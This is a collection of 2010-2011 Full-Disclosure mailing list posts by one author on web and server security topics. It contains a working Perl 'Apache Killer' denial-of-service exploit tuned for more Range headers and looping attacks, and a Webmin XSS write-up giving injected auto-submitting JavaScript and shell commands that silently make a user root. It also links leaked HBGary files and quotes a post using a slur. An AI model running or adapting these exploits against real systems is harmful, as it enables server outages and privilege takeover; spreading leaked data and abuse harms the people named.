Re: [Full-disclosure] one of my servers has been compromized

2011-12-05 Thread Javier Bassi
In addition to the tips given (chroot, disable shell_exec,etc), you
should also use open_basedir with DocumentRoot as path on each
VirtualHost. In case of a compromise via webapp, this will reduce the
compromised zone in the filesystem to the DocumentRoot of one
VirtualHost instead of the whole chroot jail.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] CodeV discovers 31 vulnerabilitys on 5 OS softwares

2011-11-23 Thread Javier Bassi
On Wed, Nov 23, 2011 at 8:11 AM, Press - Dognædis pr...@dognaedis.com wrote:
 Dear FullDisclosure,

 CodeV is a static code analysis tool (currently for php only, but soon
 to be developed to other languages) developed by Dognaedis
  to offer a tool to integrate in the
 development of the life cycle of software in order to detect
 vulnerabilities that arise from bad input validations as soon as they
 hit the code. The tool has a public demo version that is limited to a
 script with 250 lines of code and is available at


 We analyzed some Open Source software to test our own tool and
 discovered 31 new vulnerabilities in 5 different opensource softwares.
 Following responsible disclosures of discovered vulnerabilities
 throughout CodeV's Open Source Software analysis, we are here reporting
 all the vulnerabilities discovered as soon as possible to the community,
 offering security not only to our clients but to the entire public. All
 the vulnerabilities brought to public previously followed the necessary
 disclosure protocol to the responsible teams. The vulnerabilities
 discovered can be found in

 Thank you for your time and we hope you enjoy CodeV.

I liked the disclaimer in submit-ok.html

DISCLAIMER: Lorem ipsum dolor sit amet, consectetur adipisicing elit,
sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut
enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi
ut aliquip ex ea commodo consequat. Duis aute irure dolor in
reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla
pariatur. Excepteur sint occaecat cupidatat non proident, sunt in
culpa qui officia deserunt mollit anim id est laborum. 

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Some hash values

2011-10-09 Thread Javier Bassi
On Sun, Oct 9, 2011 at 2:44 PM, Michal Zalewski lcam...@coredump.cx wrote:
 I believe that this is the best place to post the following hash values:
 MD5Sum:a762a3b9cbfb3d63034646087680b254
 SHA1sum:6f25d72bd693b52de25c36d04f9e17f945420580
 SHA256sum:d5886dd14f3eac029d771da6bcc6d49bc2e50c79159e5390c9c0776c725243a5

 No, for these specific hash values, I believe the appropriate place to
 post them would be deviantArt.

Use subject 'noise' when posting the hashes of your 0day-exploit you
are trying to sell.
Like this dude
http://seclists.org/fulldisclosure/2011/Jul/21

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Apache Killer

2011-09-13 Thread Javier Bassi
On Mon, Sep 12, 2011 at 11:26 PM, xD 0x41 wrote:
 I know this topic is OLD but, i just wonder and, also having spoken to kcope
 re this myself, discussed the size of each bucket wich can be made to
 stupendous amounts and using a different vector, ok, instead of Range:bytes=
 , picture a GET request with as was shown in the code is there, you
 Request-Range: bytes=5-,5-69,5- , now we have bypassed most filters
 already in place, and the request range code, is exactly the same as range
 code.
 Only one person spotted this.

HTTPD advisory was very clear that both Range and Request-Range can be
used. Everyone who unset Range probably unset Request-Range too. If
host is vulnerable its a little better to use Range because using
Request-Range will take 8 bytes more. (more bytes = less ranges)

I have tested a bit the exploit and saw 1300 ranges is just a fixed
number chosen by kingcope but it can be a little bigger. Range field
can be almost 8KB long and its a total waste of bytes to use x-y,
format where y is an increasing number that will take more than one
digit. So instead of 1300 you can get it to 2725 max if you use repeat
x-, where x is always single digit number. By doing that the exploit
gets much more effective.

I have attached the source if anyone cares
#Apache httpd Remote Denial of Service (memory exhaustion)
#Exploit by Kingcope. Concept by Michal Zalewski
#Some modifications by Javier Bassi.
#original code: http://seclists.org/fulldisclosure/2011/Aug/175
#Year 2011
#
# Will result in swapping memory to filesystem on the remote side
# plus killing of processes when running out of swap space.
# Remote System becomes unstable.
#

use IO::Socket;
use Parallel::ForkManager;

sub usage {
	print Apache Remote Denial of Service (memory exhaustion)\n;
	print by Kingcope.\n;
	print usage: perl killapache.pl host [numforks] page\n;
	print example: perl killapache.pl www.example.com 50 index.php\n;
}

$w = ;
$num=0;
for ($k=0;$k2725;$k++) {
	$w .= ,$num-;
	$num++;
	if ($num == 10)
	{
		$num=0;
	}
}

sub killapache {
use vars qw($w);
print ATTACKING $ARGV[0] [using $numforks forks]\n;
	
$pm = new Parallel::ForkManager($numforks);

for ($k=0;$k$numforks;$k++) {
my $pid = $pm-start and next; 	
	
$x = ;
my $sock = IO::Socket::INET-new(PeerAddr = $ARGV[0],
 PeerPort = 80,
 			 Proto= 'tcp');

$p = HEAD $path HTTP/1.1\r\nHost: $ARGV[0]\r\nRange:bytes=0-$w\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n;
print $sock $p;

while($sock) {
}
 $pm-finish;
}
$pm-wait_all_children;
}

sub testapache {
my $sock = IO::Socket::INET-new(PeerAddr = $ARGV[0],
 PeerPort = 80,
 			 Proto= 'tcp');

$p = HEAD / HTTP/1.1\r\nHost: $ARGV[0]\r\nRange:bytes=0-\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n;
print $sock $p;

$x = $sock;
if ($x =~ /Partial/) {
	print host seems vuln\n;
	return 1;	
} else {
	return 0;	
}
}

if ($#ARGV  0) {
	usage;
	exit;	
}

if ($#ARGV = 1) {
	$numforks = $ARGV[1];
} else {$numforks = 50;}

$path = ($#ARGV  1) ? '/' . $ARGV[2] : '/';

$v = testapache();
if ($v == 0) {
	print Host does not seem vulnerable\n;
	exit;	
}
while(1) {
killapache();
}
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] [webmin-devel] XSS in Webmin 1.540 + exploit for privilege escalation

2011-05-21 Thread Javier Bassi
 In what Webmin-release this will be fixed? Do you have CVE-identifier for 
 this yet?

The new version (Webmin 1.550) fixes this vulnerability. I don't have
CVE-id, I tried to contact cve.mitre.org guys with no luck. I have BID
Bugtraq ID: 47558

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Facebook

2011-05-03 Thread Javier Bassi
On Tue, May 3, 2011 at 7:51 PM, Daniel Clemens
daniel.clem...@packetninjas.net wrote:
 Prove it!
 You clearly know nothing about our legal system.

You might find this links interesting
http://www.youtube.com/watch?v=t0aQojDGSD4
http://www.google.com/transparencyreport/governmentrequests/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] XSS in Webmin 1.540 + exploit for privilege escalation

2011-04-23 Thread Javier Bassi
Information

Name :  XSS vulnerability in Webmin
Software :  All versions prior to and including 1.540 are affected.
Vendor Hompeage :  http://www.webmin.com
Vulnerability Type :  Cross-Site Scripting
Severity :  Medium
Researcher :  Javier Bassi javierbassi [at] gmail [dot] com


Description
--
Webmin is a web-based interface for system administration for Unix.
Using any modern web browser, you can setup user accounts, Apache,
DNS, file sharing and much more.
https://secure.wikimedia.org/wikipedia/en/wiki/Webmin


Details
---
Webmin is affected by a XSS vulnerability in all versions prior to and
including 1.540.
Webmin fails to sanitize $real in useradmin/index.cgi. $real is the
Full Name in the finger information of the user. useradmin/index.cgi
is the control panel of the Users  Groups section in webmin.
An attacker that has a normal user on the victim's machine could be
able to change his Full Name with chfn command, inject XSS and execute
commands as root.


Timeline:
---
2011.04.24 - announced at my site/informed developers/disclosed at my site.


Solution:
---
wait for updates.


Developing a exploit:
---
With Webmin you can execute shell commands and the only security
measure Webmin has is checking the Referer in the HTTP headers. So we
can't use iframe, but we can bypass this protection by injecting a
code that execute a Javascript file that prints a form that
autosubmits itself to the Webmin's shell.cgi and execute mutiple
commands in the format command1;command2;...;commandn
So XSS--.js--form--autosubmit--shell.cgi

The injected code will be displayed inside a form, so we need to close
the original form first with /form.
The shell/index.cgi form is the next one:

/formform class='ui_form' style=visibility:hidden
action='https://zion:1/shell/index.cgi' method=post
enctype=multipart/form-data 
input class='ui_submit' type=submit value=Execute command:
input class='ui_textbox'type=hidden name=cmd value= size=50
style='width:100%'/td
input class='ui_submit' type=submit name=clear value=Clear history
input class='ui_hidden' type=hidden name=pwd value=/root
input class='ui_hidden' type=hidden name=history value=
input class='ui_hidden' type=hidden name=previous value=find /usr
-name sftp-server
input class='ui_hidden' type=hidden name=previous value=echo
/usr/lib/sftp-server  /etc/shells
input class='ui_hidden' type=hidden name=previous value=cat /etc/shells
input class='ui_hidden' type=hidden name=previous value=find
/usr/lib -name sftp-server
input class='ui_hidden' type=hidden name=previous value=echo
/usr/lib/openssh/sftp-server  /etc/shells
input class='ui_submit' type=submit name=doprev value=Execute
previous command
select class='ui_select' name=pcmd option value=echo
/usr/lib/openssh/sftp-server  /etc/shells echo
/usr/lib/openssh/sftp-server  /etc/shells
option value=find /usr/lib -name sftp-server find /usr/lib -name sftp-server
option value=cat /etc/shells cat /etc/shells
option value=echo /usr/lib/sftp-server  /etc/shells echo
/usr/lib/sftp-server  /etc/shells
option value=find /usr -name sftp-server find /usr -name sftp-server
/selectinput type=button name=movecmd value='Edit previous'
onClick='cmd.value = pcmd.options[pcmd.selectedIndex].value'
input class='ui_submit' type=submit name=clearcmds value=Clear commands
/form

We use Javascript to autosubmit it. We add id=lala in form tag and
also we add the next script at the end of the code:
scriptdocument.getElementById('lala').submit();/script

Commands go in 'cmd' input. A nice combination of commands could be:
chfn -f safename neo;usermod -G root neo;usermod -g root neo;killall
-9 firefox-bin
So when the admim browse Users  Groups this will change the Full
name of our user 'neo' back to a safe one, makes us root and kill
firefox. The admin will think firefox crashed and when he goes back to
Users and Groups in Webmin it will not crash again beause we already
changed our full name.
To include commands in value= they must be html escaped: (
http://www.htmlescape.net/htmlescape_tool.html )
chfn -f quot;safenamequot; neo;usermod -G root neo;usermod -g root
neo;killall -9 firefox-bin

Now we need a .js file that prints the form + the autosubmit code.
(thx to 
http://accessify.com/tools-and-wizards/developer-tools/html-javascript-convertor/
)
It will look like this

document.write(\/formform class='ui_form'
style=\visibility:hidden\ id=\lala\
action='https:\/\/zion:1\/shell\/index.cgi' method=post
enctype=multipart\/form-data );
document.write(input class='ui_submit' type=submit value=\Execute
command:\);
document.write(input class='ui_textbox'type=hidden name=\cmd\
value=\chfn -f quot;safenamequot; neo;usermod -G root neo;usermod
-g root neo;killall -9 firefox-bin\ size=50
style='width:100%'\/td);
document.write(input class='ui_submit' type=submit name=\clear\
value=\Clear history\);
document.write(input class='ui_hidden' type=hidden

Re: [Full-disclosure] Google Search Feature Exploitation Scenario

2011-04-13 Thread Javier Bassi
On Tue, Apr 12, 2011 at 6:11 PM, Cal Leeming wrote:
 Actually, the filtering seems to be based on the accuracy of the first hit
 set.
 http://www.google.com/search?q=hackerbtnI - win
 http://www.google.com/search?q=hello+hackerbtnI - fail
 http://www.google.com/search?q=hello+hackbtnI - win
 http://www.google.com/search?q=hello+hacbtnI - fail
 http://www.google.com/search?q=hellobtnI - win
 See what I mean?

satyam was right. It also depends on geographical locations. I got
redirected with all those links.
I'm feeling lucky (?)

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Facebook URL redirection issue

2011-04-03 Thread Javier Bassi
 Reported this issue to Facebook team on 03/22/11 and Facebook team 
 acknowledged this issue on 03/29/11 and fixed this vulnerability.

They still have redirects on apps made by their users, and they don't care
http://apps.facebook.com/truthsaboutu/track.php?r=http://www.google.com
and if someone falls in basic phishing with facebook domain, he will
fall with apps.facebook subdomain too.

Btw, linkedin has open redirect too and they couldn't care less about it
http://www.linkedin.com/redirect?url=www.google.com

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Facebook URL Redirect Vulnerability

2011-03-03 Thread Javier Bassi
On Thu, Mar 3, 2011 at 4:04 PM, Chris Evans scarybea...@gmail.com wrote:
 You do not need an open redirect to trick the user. Try a
 href=http://www.evil.com;www.facebook.com/OMFGacatvomitingacanaryandpuppiesandshit/a

You are all suggesting scenarios in which only a non-tech person would
fall. Everybody knows that JavaScript can change the status text when
mouserovering a link. This is what Google does in the search results.
(Although you can disable this in Firefox in Advanced JavaScript
Settings)

Also with Nathan's scenario. Even if Facebook only displays
'apps.facebook.com' when posting the link, if the person clicks there
it means he is already on Facebook. If he is already logged in
Facebook, clicking on a link going to a login page is way too obvious.

A good scenario would be via Instant Message. There is no HTML or
JavaScript and when the victim clicks a link he knows he's going to
that link, and there is a big chance he will not notice it is a
redirect.  From http://apps.facebook.com/stuff to
http://apps.facebook.evil.com/stuff  can do the trick.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] HBGary Mirrors?

2011-02-19 Thread Javier Bassi
On Fri, Feb 18, 2011 at 1:24 PM, ck c.kernst...@googlemail.com wrote:
 So, the FEDs shut down all mirrors of the HBGary files - or didn't they?

Just in case anyone wants to host a mirror, they are seeding a full
backup of the anonleaks website (6.7GB)
Here is the .torrent
http://www.2shared.com/file/ZkCwq_ZZ/hbgaryanonleaksrutargz.html

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] An enemy of the infosec community needs to be brought to justice

2011-02-11 Thread Javier Bassi
On Fri, Feb 11, 2011 at 5:30 PM, Leon Kaiser litera...@gmail.com wrote:
 The pastebin link seems to be down, would you/a third party be so kind as to 
 mirror it?

http://www.2shared.com/file/4z209Olp/lgtt7z.html

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Want to remove Encyclopedia Dramatica article? Think again. Sherrod DeGrippo, Andrew Auernheimer's cyberbully paradise.

2011-01-07 Thread Javier Bassi
About deleting ED article:
http://gawker.com/5709789/noose-closes-around-pro+wikileaks-vigilantes

On Fri, Jan 7, 2011 at 4:46 AM, Cal Leeming [Simplicity Media Ltd]
cal.leem...@simplicitymedialtd.co.uk wrote:
 This has to be said.
 Nicholarse Castor sounds like a complete and utter faggot.
 On Fri, Jan 7, 2011 at 7:34 AM, Victor Rigo victor_r...@yahoo.com wrote:

 Post:
 http://crimint.wordpress.com/2011/01/07/why-encyclopedia-dramatica-is-so-insidious/

 It’s a graffiti wall.

 The first level of wrong is the action. The action that is mean-spirited
 toward an individual. Everyone has done something mean or retaliatory
 before, others have done embarrassing things.

 Maybe you trolled someone. Maybe you posted pictures of yourself online.
 This in itself is bad, however, in time-space, unless a serious tragedy is
 committed, life goes on. You can forget.

 Encyclopedia Dramatica perpetuates a horrendous act to the annals of
 history for the perverse enjoyment of anonymous cowards. It sounds like the
 detective’s best tool. Think about it, it’s open source intelligence. :D

 The difficulty is tragic. The protections for free speech in the United
 States are so wrong and laws in states are very new. I have not seen any
 criminal cases based off harassment

 When graffiti is on the wall, we could normally call up the city to clean
 it off. ED makes this troublesome if not impossible.

 * Encyclopedia Dramatica is an entity owned by Sherrod DeGrippo. To set
 the tone her capacity for empathy, she links to a republished list of
 pedophilia books [1] on her home page GirlVinyl.com.
 * Encyclopedia Dramatica also has access to attack dog weev (aka Andrew
 Auernheimer). He is belligerent to any thought of removal of posts, unless
 you’re willing to strip naked and masturbate [2].
 * Encyclopedia Dramatica is ran by a hivemind trolls who are miserable.
 They are feeding off each other for lulz, which psychotically is the
 enjoyment of pain of another.
 * Streisand Effect Zone. Attempts to censor an article, no matter how
 lurid (If you must, Nikki Catsouras) will spread the material even further.

 What we have here is the criminal mind. Not a jolted crime spree, not a
 series of youthful indiscretions. What we have is a twisted, knowing
 facilitator, a kingpin, a dark witch.

 DeGrippo doesn’t sound like someone who is miserable. Rather, she sounds
 feminine. Like someone you’re aunt would do her nails with. Her hobbies
 include interior decorating, baking, and hosting a site which gives people
 nightmares at night.

 That’s why I made the post Sherrod DeGrippo’s Nightmare Machine. [3]

  End Notes
 
 [1] DeGrippo, Sherrod. List of Pedophilia and Incest books.  2011-01-07.
 URL: http://girlvinyl.com/lj2007/LJbannedbooks/index.html. Accessed:
 2011-01-07. (Archived by WebCite® at http://www.webcitation.org/5vYEuWoeP)
 [2] Castor, Nicholas. Want to have your article removed from Encyclopedia
 Dramatica? 2011-01-07.
 URL:http://crimint.wordpress.com/2011/01/07/want-to-have-your-article-removed-from-encyclopedia-dramatica/.
 Accessed: 2011-01-07. (Archived by WebCite® at
 http://www.webcitation.org/5vYMbt4xq)
 [3] http://seclists.org/fulldisclosure/2010/Dec/52

  Further Archives
 
 DeGrippo, Sherrod. GirlVinyl.com Homepage. 2011-01-07.
 URL:http://girlvinyl.com. Accessed: 2011-01-07. (Archived by WebCite® at
 http://www.webcitation.org/5vYFFUDpV)

  Reporting
 
 FBI. http://tips.fbi.gov
 CrimINT tipline. http://crimint.wordpress.com/send-tips/ (any cybercrime
 tips welcomed)

 Victor Rigo, CISSP
 Independent Computer Security Consultant
 Buenos Aires, AR
 +5411-4316-1901





 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/

 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] adobe.com important subdomain SQL injection again!

2010-12-19 Thread Javier Bassi
Yet Flashblock has 10 million downloads

On Sat, Dec 18, 2010 at 8:30 PM, Victor Rigo victor_r...@yahoo.com wrote:

 Let's see, flash is:

 - Cross-platform
 - Cross-architecture
 - Has it's own programming language
 - Is embedded on websites
 - Access to javascript to popup, local caches, etc.

 It's not ineptness, it's what you get when you right software that can
 actually do stuff.

 If Java applets were still the hip thing, you'd see the same thing about
 that.

 Victor Rigo, CISSP
 Computer Security Consultant
 +5411-4316-1900
 Buenos Aires, Argentina

 --- On *Sat, 12/18/10, Jeffrey Walton noloa...@gmail.com* wrote:


 From: Jeffrey Walton noloa...@gmail.com
 Subject: Re: [Full-disclosure] adobe.com important subdomain SQL injection
 again!
 To: Maciej Gojny v...@ariko-security.com
 Cc: full-disclosure@lists.grok.org.uk
 Date: Saturday, December 18, 2010, 5:53 PM


 On Sat, Dec 18, 2010 at 11:58 AM, Maciej Gojny 
 v...@ariko-security.comhttp://mc/compose?to=v...@ariko-security.com
 wrote:
  hello full disclosure!
 
  After six months from the first contact with Adobe security team,
  important
  adobe.com subdomain is still vulnerable to SQL injection attacks. We
 hope
  that this time, serious people will try to solve the problem.
 There's a reason Adobe is the most attacked software [1,2], and its
 probably because they write the most vulnerable software (or
 adversaries are looking for a challenge, which seems less intuitive
 and highly unlikely to me).

 It appears insecurity is an enterprise wide practice, and not just
 limited to their software.

 Jeff

 [1] Adobe surpasses Microsoft as favorite hacker’s target (Jul 2009)
 http://lastwatchdog.com/adobe-surpasses-microsoft-favorite-hackers-target/

 [2] Adobe predicted as top 2010 hacker target (Dec 2009)
 http://www.theregister.co.uk/2009/12/29/security_predictions_2010/

 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/



 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Facebook name + photo extraction using 'Forgot Password' page

2010-08-12 Thread Javier Bassi
Did you reported this? Apparently reset.php has been fixed.
http://img440.imageshack.us/img440/3637/screenshotjm.png

On Thu, Aug 12, 2010 at 5:06 AM, Rishabh Singla
rishabhsin...@rishabhsingla.com wrote:

 Hi everyone,

 This is with reference to the post by Mr. Atul Agarwal dated 11-Aug-10, and 
 posted here (http://seclists.org/fulldisclosure/2010/Aug/130), in which 
 Mr. Atul describes how a spammer might enter email addresses and extract the 
 names (and photos) from Facebook accounts registered against those email IDs. 
 Mr. Atul also mentions that this technique can be used to validate email 
 addresses in one's possession.

 Would like to point out that another way to harness this information is 
 through Facebook's Forgot your password? page (located at 
 http://www.facebook.com/reset.php). By entering an email address on this 
 webpage, a user's name, a photo and possibly a snippet of text is displayed 
 (assuming a Facebook user exists against this email ID).

 I came across this on 6-Jun-10, and posted the same on my blog on 7-Jun-10. 
 You might want to read the details on my blog 
 (http://blog.rishabhsingla.com/2010/06/facebooks-reset-password-page-has.html).

 Rishabh Singla
 http://blog.rishabhsingla.com/
 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Facebook name extraction based on email/wrong password + POC

2010-08-11 Thread Javier Bassi
Uploading an address book will check the privacy settings of each contacts
and it will not display contacts that have chosen not to appear in facebook
search results.
It's the same that searching for the email directly on the seach box:
http://www.facebook.com/search/?q=...@something.com

As said by Atul, when email is valid and password is not, it does not check
the privacy settings and displays profile pic+name, so this is a bug.

On Wed, Aug 11, 2010 at 11:20 AM, Atul Agarwal a...@secfence.com wrote:

 Never encountered that, nevertheless excellent find!

 Would check it and would incorporate that in the script!

 Thanks,
 Atul Agarwal
 Secfence Technologies
 www.secfence.com



 On Wed, Aug 11, 2010 at 7:41 PM, Kevin Connolly bugt...@gmail.com wrote:

 It gets better. If you enter an e-mail address that is close but not
 exactly right then Facebook will correct it for you

 
 Fixed Misspelling

 It looks like you entered a slight misspelling of your email or username.
 Please re-enter your password. 


 and it displays the corrected e-mail address in the login box :-)



 On Wed, Aug 11, 2010 at 10:01 AM, Atul Agarwal a...@secfence.com wrote:

  Hello all,

 Sometime back, I noticed a strange problem with Facebook, I had
 accidentally entered wrong password in Facebook, and it showed my first and
 last name with profile picture, along with the password incorrect message. I
 thought that the fact that it was showing the name had something to do with
 cookies stored, so I tried other email id's, and it was the same. I wondered
 over the possibilities, and wrote a POC tool to test it.

 This script extracts the First and Last Name (provided by the users when
 they sign up for Facebook). Facebook is kind enough to return the name even
 if the supplied email/password combination is wrong. Further more,it also
 gives out the profile picture (this script does not harvest it, but its easy
 to add that too). Facebook users have no control over this, as this works
 even when you have set all privacy settings properly. Harvesting this data
 is very easy, as it can be easily bypassed by using a bunch of proxies.

 As Facebook is so popular, some implications -

 1) Someone has a list of email address that he has no clue about. He can
 feed them to Facebook one by one (or in a list, using a script like this)
 and chances are that he'll get more than 50% hits. Useful for phishing
 attacks (People will get more convinced when they see their *real* names).

 2) One can generate random email addresses, and *verify* their existence
 . Hint: You can generate emails using (common names + a corporate domain),
 and check them against Facebook. Might come handy in a Pentest.

 Rest is only left up to one's imagination.

 Find the POC script attached.

 PS: I did not report this, as I am unsure on what to call it, a bug,
 vuln or a feature.

 Thanks,
 Atul Agarwal
 Secfence Technologies
 www.secfence.com

 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/




 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] reCAPTCHA Broken

2010-08-04 Thread Javier Bassi
It doesn't work. -_-

Sometimes you can type the two words wrong and it takes them as valid.
If the words have typo mistakes like for example typing jold instead
of hold. Probably reCAPTCHA knows its a typo and corrects it.

On Tue, Aug 3, 2010 at 2:44 AM, awf awf lol-wut-h...@live.com wrote:

 1. Select Audio Captcha
 2. Type in ten random words and submit
 3. ???
 4. Profit!

 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/